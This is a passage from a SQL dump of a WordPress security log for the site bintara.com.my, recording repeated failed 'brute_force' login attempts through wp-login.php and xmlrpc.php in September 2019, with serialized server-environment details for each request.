05:52:43',17736456,19227544,'https://bintara.com.my/wp-login.php',1,0,'206.189.134.14'),(23978,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.134.14\";s:11:\"REMOTE_PORT\";s:5:\"62949\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8jLAavjo3v4tJT4rvQaAAAAJM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568613165.0003\";s:12:\"REQUEST_TIME\";s:10:\"1568613165\";}}','notice','2019-09-16 05:52:46','2019-09-16 05:52:45',18255792,19556400,'https://bintara.com.my/xmlrpc.php',1,0,'206.189.134.14'),(23979,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"216.10.243.118\";s:11:\"REMOTE_PORT\";s:5:\"38344\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8lQwavjo3v4tJT4rvRjwAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568613699.8274\";s:12:\"REQUEST_TIME\";s:10:\"1568613699\";}}','notice','2019-09-16 06:01:41','2019-09-16 06:01:40',17741256,19232608,'https://bintara.com.my/wp-login.php',1,0,'216.10.243.118'),(23980,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"216.10.243.118\";s:11:\"REMOTE_PORT\";s:5:\"38596\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8lRr1rBLb0GV3O7mTUhQAAAEI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568613702.2252\";s:12:\"REQUEST_TIME\";s:10:\"1568613702\";}}','notice','2019-09-16 06:01:43','2019-09-16 06:01:42',18255296,19553224,'https://bintara.com.my/xmlrpc.php',1,0,'216.10.243.118'),(23981,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"52004\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8oCb1rBLb0GV3O7mTU4wAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568614409.8916\";s:12:\"REQUEST_TIME\";s:10:\"1568614409\";}}','notice','2019-09-16 06:13:31','2019-09-16 06:13:30',17736456,19227544,'https://bintara.com.my/wp-login.php',1,0,'138.68.136.152'),(23982,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"52750\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8oDeBXE2JRepjOtvmqcgAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568614413.248\";s:12:\"REQUEST_TIME\";s:10:\"1568614413\";}}','notice','2019-09-16 06:13:35','2019-09-16 06:13:33',18255792,19556400,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.136.152'),(23983,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.132.124.6\";s:11:\"REMOTE_PORT\";s:5:\"46130\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8qpQavjo3v4tJT4rvVNgAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568615077.9347\";s:12:\"REQUEST_TIME\";s:10:\"1568615077\";}}','notice','2019-09-16 06:24:39','2019-09-16 06:24:38',17737360,19229864,'https://bintara.com.my/wp-login.php',1,0,'185.132.124.6'),(23984,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.132.124.6\";s:11:\"REMOTE_PORT\";s:5:\"47096\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8qqQavjo3v4tJT4rvVPAAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568615081.1428\";s:12:\"REQUEST_TIME\";s:10:\"1568615081\";}}','notice','2019-09-16 06:24:42','2019-09-16 06:24:41',18255688,19555312,'https://bintara.com.my/xmlrpc.php',1,0,'185.132.124.6'),(23985,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"38416\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8q1Aavjo3v4tJT4rvVSwAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568615124.8721\";s:12:\"REQUEST_TIME\";s:10:\"1568615124\";}}','notice','2019-09-16 06:25:26','2019-09-16 06:25:25',17738584,19230176,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(23986,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"38954\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8q1wavjo3v4tJT4rvVTwAAAIc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568615127.7938\";s:12:\"REQUEST_TIME\";s:10:\"1568615127\";}}','notice','2019-09-16 06:25:29','2019-09-16 